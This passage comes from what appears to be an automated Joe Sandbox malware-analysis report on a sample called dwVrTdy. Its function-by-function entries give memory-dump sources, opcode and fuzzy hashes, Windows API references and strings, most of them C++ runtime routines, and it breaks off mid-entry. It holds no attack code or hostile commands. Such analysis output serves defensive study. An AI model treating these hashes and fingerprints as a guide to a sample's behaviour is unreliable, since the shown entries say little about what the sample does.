                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                                                                          • API String ID: 1386471777-1405518554
                                                                                                                                                                                                                                                                                          • Opcode ID: 846e4c0cd04731f2af0db92d87eb7701ab676c4e89739fc5b87190a254a06fa9
                                                                                                                                                                                                                                                                                          • Instruction ID: 2c105c601188324a1693d475ad417d1815d0ec48f53f9785af7899251ea37a73
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 846e4c0cd04731f2af0db92d87eb7701ab676c4e89739fc5b87190a254a06fa9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03514822A0DB81CAEB54FBA0D4522EC3374AF54748F045135DE8DB7AA6DF38E556A304
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F681B1
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F681BF
                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F681E9
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F68257
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF643F683DE,?,?,?,00007FF643F680D0,?,?,?,00007FF643F64CB1), ref: 00007FF643F68263
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                          • Opcode ID: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                                                                                                                                          • Instruction ID: 895dd8cbe304795c2146237975b033e5a2d72324f0a606ff2a1f5d42fd3e7f20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A31E722A1EA4291EE91FF12E4025782394BF48BA0F991539DD5DA77E5DF3CE4469300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
                                                                                                                                                                                                                                                                                          • Instruction ID: bbd36671e99c0ef5f0ba0b00864bc4a6e2569b1a455e99dcc5781bc919ef0132
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC218121B0D64242FAD4B73195570B962525F48BB0F540738E97EEB6D6DF6CF482A200
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                          • Opcode ID: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
                                                                                                                                                                                                                                                                                          • Instruction ID: 706625eb902b84a5c541124d422b47a7a0d0f91053d356e1f3c0efdb6e9d3c78
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64114F2161CA42C6E790BF52A85672962A0BB88BE8F444234EE5DD7BE4DF7CD9148740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2829165498-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ccac95c82485fecce9b0c6ca905e097cdd8d98d264d71d609707ec9c4594a67f
                                                                                                                                                                                                                                                                                          • Instruction ID: 2b35adcfa562a8142d1ca382d7239dfc7c7e06ed52e263ec7e35ea0ceef83d8f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccac95c82485fecce9b0c6ca905e097cdd8d98d264d71d609707ec9c4594a67f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8281D232A0CB4296EBA0BF61E44126972E5FF447E8F145631EA5DA7BE8DF3CD4029700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
                                                                                                                                                                                                                                                                                          • Instruction ID: 476adbc96321a0347c5563fa47b2f166d0d32bf81b387c4e355528924d0b3abf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0851C63390C68685E7E2BF2495622BD3B919B15B84F489031C6CCD73D6DE2DA80BE701
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00007FF643F62225
                                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F62244
                                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F62266
                                                                                                                                                                                                                                                                                          • sys_get_time.LIBCPMT ref: 00007FF643F62281
                                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F622A7
                                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF643F61192,?,?,?,00007FF643F49640), ref: 00007FF643F622BF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 184115430-0
                                                                                                                                                                                                                                                                                          • Opcode ID: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
                                                                                                                                                                                                                                                                                          • Instruction ID: 254d9330d7f680ac330e447a4c878160cf997869a947fa5a019e02d7e4d3e30c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C411932A0C646D6EBA4BF64D44227873A0FB54B48F405135DA4EE76D9DF3CE896EB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                                                                                                                                          • Instruction ID: 6410f694d1822307a815a7d66e5acc485e1159d5014437e842ce68d71023327c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB317322A0CA4281EAA0FB15E5821BA7360FB74B94F084132DE9DA77E6DF3CE4459740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
                                                                                                                                                                                                                                                                                          • Instruction ID: ce72049139bd0c935ba8b0d5236b3bbd176efefbd6a7bf80f22b4219c93a84e2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31B322A0CA4284FAA1FF15F5521B97360FB64B98F084132EA8DE77E6DF3CE4519700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                          • Opcode ID: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
                                                                                                                                                                                                                                                                                          • Instruction ID: 647f8b58a589498ce2497a6d6005eb5018074f66346d3a4d7989c980932ef44a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD319562A0CA0284FA90FF15E4461B97360FB547D8F489132DA9D977E6DF3CE441D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2081738530-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
                                                                                                                                                                                                                                                                                          • Instruction ID: a4dd547ef673d15dc7be36950197c79b1c0b84355d9871d95ed9b3f2b1a65688
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D931A122A0DB42C1FA85BB55D4425B96321EB54BA0F0C8532EE5DE77E6DE7CE442A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                          • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                                                          • Opcode ID: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                                                                                                                                          • Instruction ID: 0b026971760f6afdcfa8805ec22bbc6543f2fb7b54f75512bd7541f7a828884a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E1A17290C6828AEB90FF24D4822AD77A0FB55748F152135DE8DA76D6DF3CE486DB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                                                                                                                                          • API String ID: 2967684691-1405518554
                                                                                                                                                                                                                                                                                          • Opcode ID: 8b208ad68de6242f5f08806ea59c8bdb97e470cb0bca67ad8fd033dff58c0110
                                                                                                                                                                                                                                                                                          • Instruction ID: 4ce3f5c1ce5018fc30102dc29e48ce2a604f32e5a858202192b9f3422fdaca37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b208ad68de6242f5f08806ea59c8bdb97e470cb0bca67ad8fd033dff58c0110
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21414822B0DB81D9EB90FFB0D4522FC33A4AF44748F044435DE8DB7AAADE399516A344
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: exists$status
                                                                                                                                                                                                                                                                                          • API String ID: 1686256323-1990824825
                                                                                                                                                                                                                                                                                          • Opcode ID: f06e2ffcdc494b7c5119ab9b591de6b65a472f2ade76fd56745bacc6e474f3cc
                                                                                                                                                                                                                                                                                          • Instruction ID: f79a459bf4f8059d09eeb9e70598964e58f8f30bab22f6606ec0970a30c1e694
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f06e2ffcdc494b7c5119ab9b591de6b65a472f2ade76fd56745bacc6e474f3cc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B141B223F18A829AF740FBA4D5022EC2371AB54758F904636DE5DB3AD9EE38D546D340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
